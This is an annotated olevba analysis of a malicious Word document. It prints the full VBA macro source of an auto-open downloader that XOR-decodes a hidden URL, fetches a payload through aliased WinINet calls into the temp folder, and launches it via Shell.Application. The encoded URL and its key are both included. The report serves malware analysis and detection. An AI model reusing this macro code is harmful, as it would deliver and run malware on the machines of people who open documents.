olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASIHB- 02.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: 02.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: 02.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Analyst note: autoopen() is the auto-executable entry point (see the AutoExec
' row in the ANALYSIS table below). It calls InIn, which calls CALTHA in module
' PIDLE0. The visible chain is:
'   autoopen -> InIn -> CALTHA -> CALANTHA -> BRITTNEY -> BROGAN
Sub InIn()
    CALTHA
End Sub
Sub autoopen()
    InIn
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO FILE6.bas
in file: 02.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Option Explicit
' Analyst note: module FILE6 holds the download routine (BRENDA) and the routine
' that drops and opens the downloaded file (BROGAN).
' BRITTANIA is not referenced by any macro shown in this report.
Public Const BRITTANIA = "BRITTANY"
' Size of the fixed-length read buffer BRIDGET, and the byte count requested
' from each InternetReadFile call.
Private Const BRANDI = 8162
' Agent string handed to InternetOpenA. WinINet sends it as the HTTP User-Agent,
' so "HAZ" is usable as a network-side indicator for this sample.
Private Const BRANDY As String = "HAZ"
' lAccessType argument of InternetOpenA (1 is INTERNET_OPEN_TYPE_DIRECT).
Private Const BREANA = 1
' Private to this module; the only use of the name BREDA in this report is in
' BRITANNIA (module IDL4).
Private Const BREDA = &H4000000

' BRENDA(BREE): opens a WinINet session, asks BRITANNIA (module IDL4) to open
' the remote URL, reads the response in BRANDI-sized chunks and writes the
' collected data to the file path BREE in binary mode.
' Returns True when data was collected (BRIONY <> 0); in every other case the
' function returns the default False.
' CAMEO, BRITNEY and BRITTANI are the wininet.dll aliases declared in module
' IDL4 for InternetOpenA, InternetReadFile and InternetCloseHandle.
Public Function BRENDA _
(ByVal BREE As String) As Boolean
    ' Handle variables are pointer-sized on 64-bit Office, Long otherwise.
    #If VBA7 _
    And Win64 Then
    Dim BRETT As LongPtr, BRIANNA As LongPtr
    #Else
    Dim BRETT As Long, BRIANNA As Long
    #End If
    Dim BRIAR As Long
    Dim BRIDGET As String * BRANDI, BRIELLE As String
    Dim BRIER As Integer, BRIONY As Double
    ' BRETT = session handle from InternetOpenA; give up if it is zero.
    BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
    If BRETT = 0 Then
        Exit Function
    End If
    ' FiGaMan is declared but never used in the visible code.
    Dim FiGaMan As Boolean
    ' BRITANNIA stores the URL handle in BRIANNA (ByRef). Its Boolean result is
    ' ignored here: the If body is empty.
    If BRITANNIA(BRIANNA, BRETT) Then
    End If
    If BRIANNA = 0 Then
        ' No URL handle: nothing is written and BRENDA stays False.
        BRIONY = 0
    Else
        ' First read: the whole fixed-length buffer is copied into BRIELLE,
        ' not only the BRIAR bytes actually read.
        BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
        BRIELLE = BRIDGET
        ' Further reads: append the first BRIAR characters of each chunk until
        ' InternetReadFile reports zero bytes read.
        Do While BRIAR <> 0
            BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
            ' Junk loop: the counter runs 6..8 and never equals 38, so End is
            ' never reached. The same padding pattern recurs in other routines.
            Dim BRITT As Long
            For BRITT = 6 To 8
                If BRITT = 38 Then End
            Next BRITT
            BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
        Loop
        ' Write the accumulated string to BREE through a free file number.
        BRIONY = Len(BRIELLE): BRIER = FreeFile
        Open BREE _
        For Binary Access Write _
        Lock Write _
        As #BRIER
        Put #BRIER, _
        , BRIELLE
        ' Junk loop (2..3 never equals 37).
        Dim BRITTA As Double
        For BRITTA = 2 To 3
            If BRITTA = 37 Then End
        Next BRITTA
        Close #BRIER
    End If
    ' Close the URL handle and the session handle (InternetCloseHandle).
    BRITTANI BRIANNA
    BRITTANI BRETT
    BRIELLE = ""
    If BRIONY Then
        BRENDA = True
    End If
End Function

' BRITTNEY ignores its string argument and only forwards to BROGAN.
Public _
Function BRITTNEY(BRITTNY _
As _
String)
    BROGAN
End Function

' BROGAN: builds a target path, downloads to it via BRENDA, then opens the file.
' Every string it needs is produced at run time by BROOK (module PIDLE0) from
' the hex constants and the key BROOKE in module IDL4:
'   BROOK(BROOKE, BROOKLYN) decodes to "Scripting.FileSystemObject"
'   BROOK(BROOKE, CAETLIN)  decodes to "Shell.Application"
'   BROOK(BROOKE, BUNTY)    is the file name appended to the folder path
' Detection-relevant behaviour: a Word macro that creates a file in the folder
' returned by GetSpecialFolder(2) and then opens it through a shell object.
Public Function BROGAN()
    Dim BRONTE As Object
    Set BRONTE = CreateObject _
    (BROOK(BROOKE, BROOKLYN))
    ' BRYONY (module IDL4) returns BRONTE.GetSpecialFolder(2); for the
    ' FileSystemObject the value 2 is the temporary folder.
    Dim BRYANNA As Object
    Set BRYANNA = BRYONY(BRONTE)
    Dim BUFFY
    Dim BUNNY
    BUNNY = BROOK(BROOKE, BUNTY)
    ' BUFFY = full path of the file to be written.
    BUFFY = BRYANNA & BUNNY
    ' Two junk loops (6..7 never equals 33, 2..3 never equals 34).
    Dim BURGUNDY As Integer
    For BURGUNDY = 6 To 7
        If BURGUNDY = 33 Then End
    Next BURGUNDY
    Dim CADENCE As Integer
    For CADENCE = 2 To 3
        If CADENCE = 34 Then End
    Next CADENCE
    ' CADY (module IDL4) wraps FileExists: remove a file left at that path.
    If CADY(BRONTE, BUFFY) Then
        BRONTE. _
        DeleteFile BUFFY
    End If
    ' Download to BUFFY. The result is not acted on (empty If body), and
    ' neither is the existence check that follows.
    If BRENDA(BUFFY) Then
    End If
    If CADY(BRONTE, BUFFY) Then
    End If
    ' Open the written file through the second decoded object. This runs
    ' whether or not the download succeeded.
    Dim CAELIE
    Set CAELIE = CreateObject _
    (BROOK _
    (BROOKE, CAETLIN))
    CAELIE.Open BUFFY
End Function

' CANDICE is a one-line wrapper around Len; BROOK uses it for the length of the
' hex string.
Public Function CANDICE(CANDIDA As String) As Integer
    CANDICE = Len(CANDIDA)
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | Open           | May open a file                         |
| Suspicious | Write          | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Put            | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Binary         | May read or write a binary file (if     |
|            |                | combined with Open)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO PIDLE0.bas
in file: 02.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' CALTHA: second hop of the auto-open chain. Apart from a junk loop (44..46
' never equals 32) it only calls CALANTHA (module IDL4). The value 89 it passes
' is not used by CALANTHA.
Sub CALTHA()
    Dim CAMELLIA As Long
    Dim CANDIS As Double
    For CANDIS = 44 To 46
        If CANDIS = 32 Then End
    Next CANDIS
    CAMELLIA = 89
    CALANTHA (CAMELLIA)
End Sub

' BROOK(CAMERON, CAMILLA): string de-obfuscator.
'   CAMERON = key, CAMILLA = ciphertext as a string of hex digit pairs.
' For each pair i (1-based) the byte value is XORed with the character code of
' the key at position (i Mod Len(key)) + 1, so the key is consumed starting
' from its second character and wraps around. The result is the decoded string.
' This is why olevba flags Chr and Xor for this module, and why the strings
' passed to CreateObject and to the download call do not appear in clear text
' anywhere in the macro source.
Public Function BROOK(CAMERON As String, CAMILLA As String) As String
    Dim CAMILLE As Integer
    Dim CAMMIE As Integer
    ' Junk loop (1..3 never equals 32).
    Dim CAMRYN As Double
    For CAMRYN = 1 To 3
        If CAMRYN = 32 Then End
    Next CAMRYN
    Dim CANDACE As Long
    Dim CANDI As String
    ' The statements below are split over continuation lines in the sample.
    ' Loop bound: CANDICE(CAMILLA) / 2, i.e. the number of hex pairs.
    For CANDACE = 1 _
    To _
    ( _
    CANDICE _
    (CAMILLA) _
    / 2)
        ' CAMILLE = value of the i-th hex pair.
        CAMILLE = Val("&H" & _
        (Mid$(CAMILLA, _
        (2 * CANDACE) - 1, 2)))
        ' CAMMIE = character code of the key character for this position.
        CAMMIE = Asc(Mid$(CAMERON, _
        ((CANDACE Mod Len(CAMERON)) + 1), 1))
        CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
    Next CANDACE
    BROOK = CANDI
End Function
- - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+---------+-----------------------------------------+
| Type       | Keyword | Description                             |
+------------+---------+-----------------------------------------+
| Suspicious | Chr     | May attempt to obfuscate specific       |
|            |         | strings                                 |
| Suspicious | Xor     | May attempt to obfuscate specific       |
|            |         | strings                                 |
+------------+---------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO IDL4.bas
in file: 02.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Analyst note: the first four constants are hex-encoded ciphertexts and BROOKE
' is the XOR key; all are decoded at run time by BROOK (module PIDLE0).
' Where each one is used in the visible code:
'   CAETLIN  -> CreateObject in BROGAN (decodes to "Shell.Application")
'   BUNTY    -> file name appended to the GetSpecialFolder(2) path in BROGAN
'   CAITLYN  -> URL passed to InternetOpenUrlA in BRITANNIA
'   BROOKLYN -> CreateObject in BROGAN (decodes to "Scripting.FileSystemObject")
' The decoded CAITLYN and BUNTY values are the network and file indicators of
' this sample. They are not reproduced here; recover them statically with the
' BROOK algorithm rather than by running the document.
' NOTE(review): olevba also reports "Base64 Strings" for this module; that hit
' may come from the hex constants or upper-case identifiers rather than real
' Base64 data - confirm with --decode.
Public Const CAETLIN = "6750505D5F1E74464055585B544C5B565A"
Public Const BUNTY = "68425A535244051801581F5D4D5D"
Public Const CAITLYN = "5C4C4141091F1A504A4A4716515D1D0B06071A0E011E524A56"
Public Const BROOKLYN = "675B475843445C5857177751595D61404743505576525D575040"
Public Const BROOKE = "3485130560918582947589072346987"

' WinINet imports under meaningless alias names. Both branches declare the same
' four functions; the first uses PtrSafe/LongPtr for 64-bit Office.
'   BRITTANI = InternetCloseHandle
'   CAMEO    = InternetOpenA
'   BRITNEY  = InternetReadFile
'   CALLIE   = InternetOpenUrlA
' Because of the aliases, searching the macro bodies for the API names finds
' nothing; the Alias strings in these Declare lines are what olevba's "Lib" and
' "wininet.dll" rows key on.
#If VBA7 And Win64 Then
Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

' BRYONY returns GetSpecialFolder(2) of the object passed in. BROGAN passes the
' object created from the decoded BROOKLYN string; for a FileSystemObject the
' value 2 selects the temporary folder.
Public Function BRYONY(ByRef CALANTHE As Object) As Object
    Set BRYONY = CALANTHE.GetSpecialFolder(2)
End Function

' CALANTHA: third hop of the auto-open chain. Its Long argument is unused, and
' the literal "CALANTHIA" it passes on is ignored by BRITTNEY (module FILE6),
' which just calls BROGAN.
Sub CALANTHA(CALEIGH As Long)
    BRITTNEY ("CALANTHIA")
End Sub

' CADY: True when CAILEIGH.FileExists(CAILYN) is true, otherwise False.
Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
    If CAILEIGH.FileExists(CAILYN) Then
        CADY = True
    Else
        CADY = False
    End If
End Function

' BRITANNIA(CALIDA, CALLA): decodes the URL (CAITLYN with key BROOKE) and opens
' it with InternetOpenUrlA on the session handle CALLA. The resulting handle is
' returned through the ByRef parameter CALIDA.
' The function result is always True, even when InternetOpenUrlA fails; the
' caller in module FILE6 tests the handle for zero instead.
' NOTE(review): BREDA is declared Private in module FILE6, so it may not be
' visible from this module - confirm which dwFlags value is actually passed.
#If VBA7 _
And Win64 Then
Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
#Else
Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
#End If
    Dim CALLIDORA As String
    CALLIDORA = BROOK(BROOKE, CAITLYN)
    CALIDA _
    = CALLIE _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    BREDA, 0)
    BRITANNIA = True
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | wininet.dll    | Executable file name                    |
+------------+----------------+-----------------------------------------+